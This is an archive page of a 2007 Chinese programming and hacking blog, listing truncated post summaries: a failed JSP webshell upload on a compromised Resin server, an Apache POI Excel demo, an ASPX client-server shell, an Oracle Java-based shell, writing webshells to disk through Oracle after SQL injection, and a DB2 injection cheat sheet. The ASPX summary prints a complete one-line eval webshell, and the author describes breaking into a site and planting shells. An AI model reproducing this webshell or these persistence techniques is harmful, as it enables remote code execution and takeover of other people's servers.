09 2007 档案
Resin-IOException: write() forbidden after writer is closed
摘要:今天AMXSA刚刚拿下一个站PCANYWHERE本来打算上传WEBSHELL的!谁知道跟我说 resin的机器报告错误!晕死!测试了所有的JSP-WEBSHELL都不支持 郁闷啊!报告了一大堆错误java.io.IOException: write() forbidden after writer is closed at com.caucho.jsp.JspWriterAdapter.write(JspWriterAdapter.java:103) at _jsp._err__jsp._jspService(err.jsp:7) at com.caucho.jsp.JavaPage.ser. 阅读全文
posted @ 2007-09-24 15:02 springside例子 阅读(319) 评论(0) 推荐(0)
JAVA POI 读EXCEL DEMO
摘要:很早之前就知道APACHE 子项目POI可以操作WORD EXCEL 等...但是一直都没去试!本来以为他是利用JNI调用本地MS的ACTIVEX呢!原来直接操作2进制文件!牛啊~呵呵~~ 刚刚好今天项目需要把EXCEL导到数据库!那就做了个简单的~加载3个JAR包 poi-3.0.1 poi-contrib-3.0.1 poi-scratchpad-3.0.1HSSFWorkbook 就是一个xls对象!首先需要创建一个HSSFWorkbook 对象HSSFWorkbook xls=new HSSFWorkbook(new POIFSFileSystem(new FileInputStrea 阅读全文
posted @ 2007-09-18 17:02 springside例子 阅读(1289) 评论(0) 推荐(0)
ASPX-C/S-SHELL 1.0
摘要:Author : kj021320Team : I.S.T.O信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)服务器端 一句话为<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>这个一句话不用说了!我之前已经发表文章讲解过!client端HTML页面代码如下<html> 阅读全文
posted @ 2007-09-17 09:31 springside例子 阅读(231) 评论(0) 推荐(0)
CSDN Blog V3.0 升级公告
摘要:亲爱的CSDN博友们: 为了让大家在CSDN体验到更贴心的服务,博客开发小组对我们的服务进行了改善,完成了2.0到3.0的升级开发。 下面是主要的改善功能和新增服务1. 彻底解决blog稳定性问题面对不断增加的访问量,CSDN博客开发团队充满信心。通过对稳定性的持续改善,CSDN blog已经能够为大家提供更加舒适的阅读和写作体验,再也不用担心无法正常访问的问题了。2. 加入文章指数评价系统文章指数评价系统是CSDN博客新推出的一项服务,通过文章的点击量、评论数、网摘收录量、以及文章的类型和长度对文章的质量做出客观的评判,让优秀的文章的作者获得更多的展现机会。3. 加入“顶”文章的功能看到好文 阅读全文
posted @ 2007-09-12 16:31 springside例子 阅读(184) 评论(0) 推荐(0)
ORACLE(SQLJ-SHELL)
摘要:首先在ORACLE数据库建立JAVA对象, 这个版本的SQLJ-SHELL 只能支持正向连接,反向连接的时候有BUG 不建议使用,不知道是ORA支持JAVA的问题还是个人能力有限...要是有更好的方法可以方便交流QQ:282720807create or replace and compile java source named isto asimport java.io.*;import java.net.*;public class ISTO{ //author: kj021320 //team: I.S.T.Opublic static String listFolder(String 阅读全文
posted @ 2007-09-08 13:36 springside例子 阅读(282) 评论(0) 推荐(0)
ORACLE 本地读写文件---ORA WRITE WEBSHELL
摘要:author : kj021320team: I.S.T.O转载需注明作者,未经作者同意,不得用于任何形式的商业活动一般我们通过函数注射以后 获得ORA的DBA权限 那么我们就得对本地文件进行操作!要是WEB跟ORA是同一个机器~那就更方便于我们拿更多的权限了~或者对本地写webshell下面是采用ORA 自带的文件访问包 操作本地文件! 前提是你必须要知道WEBSITE的物理地址以下是一个简单例子--首先我们得先建立一个 ORACLE的目录对象 指向 C:/create or replace directory IST0_DIR as 'C:/';--然后我们对这个目录对象进 阅读全文
posted @ 2007-09-06 21:22 springside例子 阅读(874) 评论(0) 推荐(0)
DB2 SQL Injection Cheat Sheet
摘要:Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though it pays to be prepared...Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection. All tests were performed on DB2 8.2 阅读全文
posted @ 2007-09-02 13:16 springside例子 阅读(324) 评论(0) 推荐(0)